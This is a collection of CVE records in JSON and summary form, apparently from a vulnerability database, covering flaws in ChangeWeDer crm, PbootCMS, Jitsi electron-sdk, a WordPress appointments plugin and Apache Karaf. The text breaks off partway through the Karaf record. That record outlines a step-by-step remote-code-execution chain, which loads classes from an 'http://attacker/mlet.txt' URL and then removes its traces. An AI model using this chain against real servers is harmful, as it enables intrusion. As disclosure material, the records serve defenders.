            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:X/RL:X/RC:R",
            "version": "3.0"
          }
        },
        {
          "cvssV2_0": {
            "baseScore": 6.5,
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P/E:ND/RL:ND/RC:UR",
            "version": "2.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-862",
              "description": "Missing Authorization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-863",
              "description": "Incorrect Authorization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-09-16T16:45:12.306Z",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "name": "VDB-405553 | ChangeWeDer crm top.upstudy.crm.controller.UserController UserController.java index authorization",
          "tags": [
            "vdb-entry",
            "technical-description"
          ],
          "url": "https://vuldb.com/vuln/405553"
        },
        {
          "name": "VDB-405553 | CTI Indicators (IOB, IOC, IOA)",
          "tags": [
            "signature",
            "permissions-required"
          ],
          "url": "https://vuldb.com/vuln/405553/cti"
        },
        {
          "name": "CVE-2026-92402 | CVE Analysis and Report",
          "tags": [
            "third-party-advisory"
          ],
          "url": "https://vuldb.com/cve/CVE-2026-92402"
        },
        {
          "name": "Submit #940349 | ChangeWeDer crm \u2014 CRM Customer Management System 0.0.1-SNAPSHOT CWE-862: Missing Authorization",
          "tags": [
            "third-party-advisory"
          ],
          "url": "https://vuldb.com/submit/940349"
        },
        {
          "tags": [
            "issue-tracking"
          ],
          "url": "https://github.com/ChangeWeDer/crm/issues/3"
        },
        {
          "tags": [
            "product"
          ],
          "url": "https://github.com/ChangeWeDer/crm/"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-09-16T00:00:00.000Z",
          "value": "Advisory disclosed"
        },
        {
          "lang": "en",
          "time": "2026-09-16T02:00:00.000Z",
          "value": "VulDB entry created"
        },
        {
          "lang": "en",
          "time": "2026-09-16T10:56:03.000Z",
          "value": "VulDB entry last update"
        }
      ],
      "title": "ChangeWeDer crm top.upstudy.crm.controller.UserController UserController.java index authorization",
      "x_generator": [
        "VulDB PVTS v202609"
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2026-92402",
    "datePublished": "2026-09-16T16:45:12.306Z",
    "dateReserved": "2026-09-16T08:50:54.007Z",
    "dateUpdated": "2026-09-22T15:45:29.315Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-92383 (GCVE-0-2026-92383)

Vulnerability from cvelistv5 – Published: 2026-09-16 15:00 – Updated: 2026-09-16 15:05
VLAI
Title
PbootCMS User Management UserController.php mod cross-site request forgery
Summary
A security vulnerability has been detected in PbootCMS up to 3.2.24. This vulnerability affects the function UserController::del/UserController::mod of the file apps/admin/controller/system/UserController.php of the component User Management. Such manipulation leads to cross-site request forgery. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. Upgrading to version 3.2.25 is able to resolve this issue. The name of the patch is c25241a0964742cefb7f698efbb6c38b868d6ff7. It is advisable to upgrade the affected component.
SSVC
Exploitation: poc Automatable: no Technical Impact: partial
CISA Coordinator · CISA-ADP (v2.0.3)
Decision recorded 2026-09-16 15:04 UTC
CWE
  • CWE-352 - Cross-Site Request Forgery
  • CWE-862 - Missing Authorization
Impacted products
Vendor Product Version
n/a PbootCMS Affected: 3.2.0
Affected: 3.2.1
Affected: 3.2.2
Affected: 3.2.3
Affected: 3.2.4
Affected: 3.2.5
Affected: 3.2.6
Affected: 3.2.7
Affected: 3.2.8
Affected: 3.2.9
Affected: 3.2.10
Affected: 3.2.11
Affected: 3.2.12
Affected: 3.2.13
Affected: 3.2.14
Affected: 3.2.15
Affected: 3.2.16
Affected: 3.2.17
Affected: 3.2.18
Affected: 3.2.19
Affected: 3.2.20
Affected: 3.2.21
Affected: 3.2.22
Affected: 3.2.23
Affected: 3.2.24
Unaffected: 3.2.25
    cpe:2.3:a:pbootcms:pbootcms:*:*:*:*:*:*:*:*
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-92383",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-09-16T15:04:54.787250Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-09-16T15:05:02.499Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "cpes": [
            "cpe:2.3:a:pbootcms:pbootcms:*:*:*:*:*:*:*:*"
          ],
          "modules": [
            "User Management"
          ],
          "product": "PbootCMS",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "3.2.0"
            },
            {
              "status": "affected",
              "version": "3.2.1"
            },
            {
              "status": "affected",
              "version": "3.2.2"
            },
            {
              "status": "affected",
              "version": "3.2.3"
            },
            {
              "status": "affected",
              "version": "3.2.4"
            },
            {
              "status": "affected",
              "version": "3.2.5"
            },
            {
              "status": "affected",
              "version": "3.2.6"
            },
            {
              "status": "affected",
              "version": "3.2.7"
            },
            {
              "status": "affected",
              "version": "3.2.8"
            },
            {
              "status": "affected",
              "version": "3.2.9"
            },
            {
              "status": "affected",
              "version": "3.2.10"
            },
            {
              "status": "affected",
              "version": "3.2.11"
            },
            {
              "status": "affected",
              "version": "3.2.12"
            },
            {
              "status": "affected",
              "version": "3.2.13"
            },
            {
              "status": "affected",
              "version": "3.2.14"
            },
            {
              "status": "affected",
              "version": "3.2.15"
            },
            {
              "status": "affected",
              "version": "3.2.16"
            },
            {
              "status": "affected",
              "version": "3.2.17"
            },
            {
              "status": "affected",
              "version": "3.2.18"
            },
            {
              "status": "affected",
              "version": "3.2.19"
            },
            {
              "status": "affected",
              "version": "3.2.20"
            },
            {
              "status": "affected",
              "version": "3.2.21"
            },
            {
              "status": "affected",
              "version": "3.2.22"
            },
            {
              "status": "affected",
              "version": "3.2.23"
            },
            {
              "status": "affected",
              "version": "3.2.24"
            },
            {
              "status": "unaffected",
              "version": "3.2.25"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "reporter",
          "value": "rockmelodeis (VulDB User)"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A security vulnerability has been detected in PbootCMS up to 3.2.24. This vulnerability affects the function UserController::del/UserController::mod of the file apps/admin/controller/system/UserController.php of the component User Management. Such manipulation leads to cross-site request forgery. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. Upgrading to version 3.2.25 is able to resolve this issue. The name of the patch is c25241a0964742cefb7f698efbb6c38b868d6ff7. It is advisable to upgrade the affected component."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P",
            "version": "4.0"
          }
        },
        {
          "cvssV3_1": {
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:P/RL:O/RC:C",
            "version": "3.1"
          }
        },
        {
          "cvssV3_0": {
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N/E:P/RL:O/RC:C",
            "version": "3.0"
          }
        },
        {
          "cvssV2_0": {
            "baseScore": 5,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N/E:POC/RL:OF/RC:C",
            "version": "2.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-352",
              "description": "Cross-Site Request Forgery",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-862",
              "description": "Missing Authorization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-09-16T15:00:11.259Z",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "name": "VDB-405519 | PbootCMS User Management UserController.php mod cross-site request forgery",
          "tags": [
            "vdb-entry",
            "technical-description"
          ],
          "url": "https://vuldb.com/vuln/405519"
        },
        {
          "name": "VDB-405519 | CTI Indicators (IOB, IOC, IOA)",
          "tags": [
            "signature",
            "permissions-required"
          ],
          "url": "https://vuldb.com/vuln/405519/cti"
        },
        {
          "name": "CVE-2026-92383 | CVE Analysis and Report",
          "tags": [
            "third-party-advisory"
          ],
          "url": "https://vuldb.com/cve/CVE-2026-92383"
        },
        {
          "name": "Submit #938602 | pbootcmspro PbootCMS  \u003c=V3.2.21 Deletion of Data Structure Sentinel",
          "tags": [
            "third-party-advisory"
          ],
          "url": "https://vuldb.com/submit/938602"
        },
        {
          "tags": [
            "exploit",
            "issue-tracking"
          ],
          "url": "https://github.com/pbootcmspro/PbootCMS/issues/70"
        },
        {
          "tags": [
            "patch"
          ],
          "url": "https://github.com/pbootcmspro/PbootCMS/commit/c25241a0964742cefb7f698efbb6c38b868d6ff7"
        },
        {
          "tags": [
            "patch"
          ],
          "url": "https://github.com/pbootcmspro/PbootCMS/releases/tag/V3.2.25"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-09-16T00:00:00.000Z",
          "value": "Advisory disclosed"
        },
        {
          "lang": "en",
          "time": "2026-09-16T02:00:00.000Z",
          "value": "VulDB entry created"
        },
        {
          "lang": "en",
          "time": "2026-09-16T10:06:48.000Z",
          "value": "VulDB entry last update"
        }
      ],
      "title": "PbootCMS User Management UserController.php mod cross-site request forgery",
      "x_generator": [
        "VulDB PVTS v202609"
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2026-92383",
    "datePublished": "2026-09-16T15:00:11.259Z",
    "dateReserved": "2026-09-16T08:01:43.835Z",
    "dateUpdated": "2026-09-16T15:05:02.499Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-92299 (GCVE-0-2026-92299)

Vulnerability from cvelistv5 – Published: 2026-09-16 01:57 – Updated: 2026-09-16 18:41
VLAI
Title
@jitsi/electron-sdk before 10.0.5 Unauthorized Screen Capture
Summary
@jitsi/electron-sdk before 10.0.5 exposes getDesktopSources() via contextBridge without requiring an active getDisplayMedia() picker, allowing any script in the meeting page to enumerate screens and windows. Attackers can call the jitsi-screen-sharing-get-sources IPC route to retrieve desktop thumbnails at arbitrary resolution without user consent or operating system permission prompts.
SSVC
Exploitation: none Automatable: no Technical Impact: partial
CISA Coordinator · CISA-ADP (v2.0.3)
Decision recorded 2026-09-16 18:40 UTC
CWE
Impacted products
Vendor Product Version
Jitsi @jitsi/electron-sdk Affected: 0 , < 10.0.5 (semver)
    cpe:2.3:a:jitsi:jitsi:*:*:*:*:*:*:*:*
Create a notification for this product.
Date Public
2026-09-07 00:00
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-92299",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-09-16T18:40:41.566501Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-09-16T18:41:32.669Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageURL": "pkg:npm/%40jitsi/electron-sdk",
          "product": "@jitsi/electron-sdk",
          "vendor": "Jitsi",
          "versions": [
            {
              "lessThan": "10.0.5",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:a:jitsi:jitsi:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "10.0.5",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Andrii Vaskovets (EVEX Security)"
        }
      ],
      "datePublic": "2026-09-07T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "@jitsi/electron-sdk before 10.0.5 exposes getDesktopSources() via contextBridge without requiring an active getDisplayMedia() picker, allowing any script in the meeting page to enumerate screens and windows. Attackers can call the jitsi-screen-sharing-get-sources IPC route to retrieve desktop thumbnails at arbitrary resolution without user consent or operating system permission prompts."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "PASSIVE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "NONE"
          },
          "format": "CVSS"
        },
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N",
            "version": "3.1"
          },
          "format": "CVSS"
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-862",
              "description": "Missing Authorization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-09-16T01:57:46.964Z",
        "orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
        "shortName": "VulnCheck"
      },
      "references": [
        {
          "name": "Pull Request #516",
          "tags": [
            "patch",
            "issue-tracking"
          ],
          "url": "https://github.com/jitsi/jitsi-meet-electron-sdk/pull/516"
        },
        {
          "name": "Patch Commit",
          "tags": [
            "patch"
          ],
          "url": "https://github.com/jitsi/jitsi-meet-electron-sdk/commit/144080fdddad2d11f7380475d4ac9bcf379cd035"
        },
        {
          "name": "Ungated SCREEN_SHARE_GET_SOURCES invoke route",
          "tags": [
            "technical-description"
          ],
          "url": "https://github.com/jitsi/jitsi-meet-electron-sdk/blob/002dae740e63a225c0bc8ed7bd53ed7ce104ebc8/screensharing/main.js#L93-L96"
        },
        {
          "name": "Gated _getSources() in 10.0.5",
          "tags": [
            "technical-description"
          ],
          "url": "https://github.com/jitsi/jitsi-meet-electron-sdk/blob/v10.0.5/screensharing/main.js#L131-L137"
        },
        {
          "tags": [
            "product"
          ],
          "url": "https://github.com/jitsi/jitsi-meet-electron-sdk"
        },
        {
          "name": "VulnCheck Advisory: @jitsi/electron-sdk before 10.0.5 Unauthorized Screen Capture",
          "tags": [
            "third-party-advisory"
          ],
          "url": "https://www.vulncheck.com/advisories/jitsi-electron-sdk-before-10.0.5-unauthorized-screen-capture"
        }
      ],
      "title": "@jitsi/electron-sdk before 10.0.5 Unauthorized Screen Capture",
      "x_generator": {
        "engine": "vulncheck-endgame"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
    "assignerShortName": "VulnCheck",
    "cveId": "CVE-2026-92299",
    "datePublished": "2026-09-16T01:57:46.964Z",
    "dateReserved": "2026-09-16T01:33:08.736Z",
    "dateUpdated": "2026-09-16T18:41:32.669Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-92245 (GCVE-0-2026-92245)

Vulnerability from cvelistv5 – Published: 2026-10-01 03:28 – Updated: 2026-10-03 15:42
VLAI
Title
Simply Schedule Appointments <= 1.6.12.32 - Missing Authorization to Unauthenticated Sensitive Information Exposure and Arbitrary Appointment Deletion via 'recursive' Parameter on the appointment_types REST Endpoint via Public Nonce
Summary
The Simply Schedule Appointments plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.6.12.32 via the 'recursive' parameter. This makes it possible for unauthenticated attackers to extract customer PII — including names, email addresses, phone numbers, and custom form field data — stored in appointment records, as well as per-appointment public_token values. The leaked per-appointment public_token values also enable unauthenticated attackers to delete arbitrary appointments via the DELETE /wp-json/ssa/v1/appointments/{id} endpoint, which accepts the token as sole authorization.
SSVC
Exploitation: none Automatable: yes Technical Impact: partial
CISA Coordinator · CISA-ADP (v2.0.3)
Decision recorded 2026-10-03 15:29 UTC
CWE
Impacted products
Vendor Product Version
croixhaug Simply Schedule Appointments Affected: 0 , ≤ 1.6.12.32 (semver)
Create a notification for this product.
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-92245",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-10-03T15:29:18.046519Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-10-03T15:42:53.270Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Simply Schedule Appointments",
          "vendor": "croixhaug",
          "versions": [
            {
              "lessThanOrEqual": "1.6.12.32",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Md. Moniruzzaman Prodhan (NomanProdhan)"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The Simply Schedule Appointments plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.6.12.32 via the \u0027recursive\u0027 parameter. This makes it possible for unauthenticated attackers to extract customer PII \u2014 including names, email addresses, phone numbers, and custom form field data \u2014 stored in appointment records, as well as per-appointment public_token values. The leaked per-appointment public_token values also enable unauthenticated attackers to delete arbitrary appointments via the DELETE /wp-json/ssa/v1/appointments/{id} endpoint, which accepts the token as sole authorization."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-862",
              "description": "CWE-862 Missing Authorization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-10-01T03:28:21.953Z",
        "orgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
        "shortName": "Wordfence"
      },
      "references": [
        {
          "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1984f80e-06ec-4d7f-9a75-e05e7b73b57c?source=cve"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.12.27/includes/class-appointment-type-model.php#L961"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.12.27/includes/lib/td-util/class-td-api-model.php#L387"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.12.27/includes/lib/td-util/class-td-api-model.php#L510"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.12.27/includes/class-bootstrap.php#L151"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.12.27/includes/lib/td-util/class-td-api-model.php#L140"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.12.27/includes/class-appointment-model.php#L2310"
        },
        {
          "url": "https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/tags/1.6.12.27/includes/class-db-model.php#L348"
        },
        {
          "url": "https://plugins.trac.wordpress.org/changeset/3709365/simply-schedule-appointments/trunk/includes/class-appointment-type-model.php"
        }
      ],
      "timeline": [
        {
          "lang": "en",
          "time": "2026-09-15T20:23:45.000Z",
          "value": "Vendor Notified"
        },
        {
          "lang": "en",
          "time": "2026-09-30T14:44:49.000Z",
          "value": "Disclosed"
        }
      ],
      "title": "Simply Schedule Appointments \u003c= 1.6.12.32 - Missing Authorization to Unauthenticated Sensitive Information Exposure and Arbitrary Appointment Deletion via \u0027recursive\u0027 Parameter on the appointment_types REST Endpoint via Public Nonce"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "b15e7b5b-3da4-40ae-a43c-f7aa60e62599",
    "assignerShortName": "Wordfence",
    "cveId": "CVE-2026-92245",
    "datePublished": "2026-10-01T03:28:21.953Z",
    "dateReserved": "2026-09-15T20:21:32.989Z",
    "dateUpdated": "2026-10-03T15:42:53.270Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2026-92142 (GCVE-0-2026-92142)

Vulnerability from cvelistv5 – Published: 2026-09-29 08:40 – Updated: 2026-10-01 14:24
VLAI
Title
Apache Karaf: Authorization bypass in JMX MBean lifecycle operations
Summary
Apache Karaf exposes a JMX MBeanServer guarded by KarafMBeanServerGuard, which enforces role-based access control (RBAC) on MBean operations invoked over the remote JMX connector (RMI registry/server, enabled by default on ports 1099 and 44444). The guard is implemented as a java.lang.reflect.Proxy around the MBeanServer, and only forwards a fixed list of operation names to the RBAC check, defined in MBeanInvocationHandler#guarded:   private final List<String> guarded = Collections.unmodifiableList( Arrays.asList("invoke", "getAttribute", "getAttributes", "setAttribute", "setAttributes")); The MBean lifecycle operations MBeanServer#createMBean, #registerMBean and #unregisterMBean are not in this list. Calls to these methods are forwarded directly to the underlying MBeanServer with no role check at all, regardless of the roles configured in etc/jmx.acl.*.cfg. As a result, any user who can authenticate to the JMX endpoint, including a user holding only the least-privileged "viewer" role, can call createMBean() to instantiate an arbitrary class as a MBean, and unregisterMBean() to remove it again afterwards, with no authorization check and no audit log entry (logging in KarafMBeanServerGuard only occurs on the RBAC-denial path, which this bypass never reaches). This is significant because javax.management.loading.MLet, a standard JDK MBean, can be instantiated this way. MLet acts as a remote classloader: its getMBeansFromURL(URL) operation fetches an MLet text file from an attacker-controlled URL and instantiates and registers the classes it lists as new MBeans in the target JVM. Reaching this operation still goes through KarafMBeanServerGuard's existing "invoke" check, but the default etc/jmx.acl.cfg grants the "viewer" role to any method name matching the wildcard rule "get* = viewer", a heuristic intended for read-only getters. Because "getMBeansFromURL" happens to start with "get", it also matches that rule, so a default installation grants "viewer" callers permission to invoke it without any Karaf-specific ACL naming MLet at all. Combined with the createMBean gap, this gives a "viewer"-role JMX client a path to remote code execution to the Karaf JVM: * Authenticate to JMX as any user with any role (e.g. "viewer"). * mbs.createMBean("javax.management.loading.MLet", objectName) is not in GUARDED_OPERATIONS, no RBAC check, MLet is instantiated and registered. * mbs.invoke(objectName, "getMBeansFromURL", new Object[]{"http://attacker/mlet.txt"}, ...) is guarded, but the method name matches the default "get* = viewer" ACL rule, so permitted. * The remote .mlet file is fetched and its listed classes are loaded and registered as new MBeans, running attacker-supplied code in the Karaf JVM. * mbs.unregisterMBean(objectName) can be used to remove the MLet afterwards, also not in GUARDED_OPERATIONS, no RBAC check, no audit trail. The fix adds createMBean, registerMBean and unregisterMBean to the guarded operation list, resolves required roles for them from the jmx.acl* configuration by ObjectName and (for createMBean/registerMBean) MBean class name, and ships default etc/jmx.acl.cfg entries restricting all three operations to the "admin" role. This allows deployments to also write class-name-specific rule, e.g.: createMBean(java.lang.String)[/javax\.management\.loading\..*/] = admin Apache Karaf users should upgrade to 4.4.12 or 4.5.0 or later, once released, as soon as possible. Until an upgrade is available, restrict network access to the JMX RMI registry/server ports (1099/44444) to trusted hosts, or avoid issuing any non-"admin" JMX credentiels.
SSVC
Exploitation: none Automatable: no Technical Impact: total
CISA Coordinator · CISA-ADP (v2.0.3)
Decision recorded 2026-10-01 14:23 UTC
CWE
Impacted products
Vendor Product Version
Apache Software Foundation Apache Karaf Affected: 0 , < 4.4.12 (semver)
Create a notification for this product.
Show details on NVD website

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2026-09-29T09:15:50.700Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "http://www.openwall.com/lists/oss-security/2026/09/28/11"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "HIGH",
              "baseScore": 8.8,
              "baseSeverity": "HIGH",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2026-92142",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-10-01T14:23:22.077130Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-10-01T14:24:03.845Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Apache Karaf",
          "vendor": "Apache Software Foundation",
          "versions": [
            {
              "lessThan": "4.4.12",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "reporter",
          "value": "MopMonk-AI \u003cmopmonk-ai@tophant.com\u003e"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "Apache Karaf exposes a JMX MBeanServer guarded by\u0026nbsp;\u003ccode\u003eKarafMBeanServerGuard\u003c/code\u003e, which enforces role-based access control (RBAC) on MBean operations invoked over the remote JMX connector (RMI registry/server, enabled by default on ports 1099 and 44444). The guard is implemented as a j\u003ccode\u003eava.lang.reflect.Proxy\u003c/code\u003e\u0026nbsp;around the MBeanServer, and only forwards a fixed list of operation names to the RBAC check, defined in\u0026nbsp;\u003ccode\u003eMBeanInvocationHandler#guarded\u003c/code\u003e:\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003e\u003ccode\u003e\u0026nbsp; private final List\u0026lt;String\u0026gt; guarded = Collections.unmodifiableList( Arrays.asList(\"invoke\", \"getAttribute\", \"getAttributes\", \"setAttribute\", \"setAttributes\"));\u003c/code\u003e\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eThe MBean lifecycle operations\u0026nbsp;\u003ccode\u003eMBeanServer#createMBean\u003c/code\u003e,\u0026nbsp;\u003ccode\u003e#registerMBean\u003c/code\u003e\u0026nbsp;and\u0026nbsp;\u003ccode\u003e#unregisterMBean\u003c/code\u003e\u0026nbsp;are not in this list. Calls to these methods are forwarded directly to the underlying\u0026nbsp;\u003ccode\u003eMBeanServer\u003c/code\u003e\u0026nbsp;with no role check at all, regardless of the roles configured in\u0026nbsp;\u003cspan\u003eetc/jmx.acl.*.cfg.\u003c/span\u003e\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eAs a result, any user who can authenticate to the JMX endpoint, including a user holding only the least-privileged \"\u003ccode\u003eviewer\u003c/code\u003e\" role, can call\u0026nbsp;\u003ccode\u003ecreateMBean()\u003c/code\u003e\u0026nbsp;to instantiate an arbitrary class as a MBean, and\u0026nbsp;\u003ccode\u003eunregisterMBean()\u003c/code\u003e\u0026nbsp;to remove it again afterwards, with no authorization check and no audit log entry (logging in\u0026nbsp;\u003ccode\u003eKarafMBeanServerGuard\u003c/code\u003e\u0026nbsp;only occurs on the RBAC-denial path, which this bypass never reaches).\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cdiv\u003eThis is significant 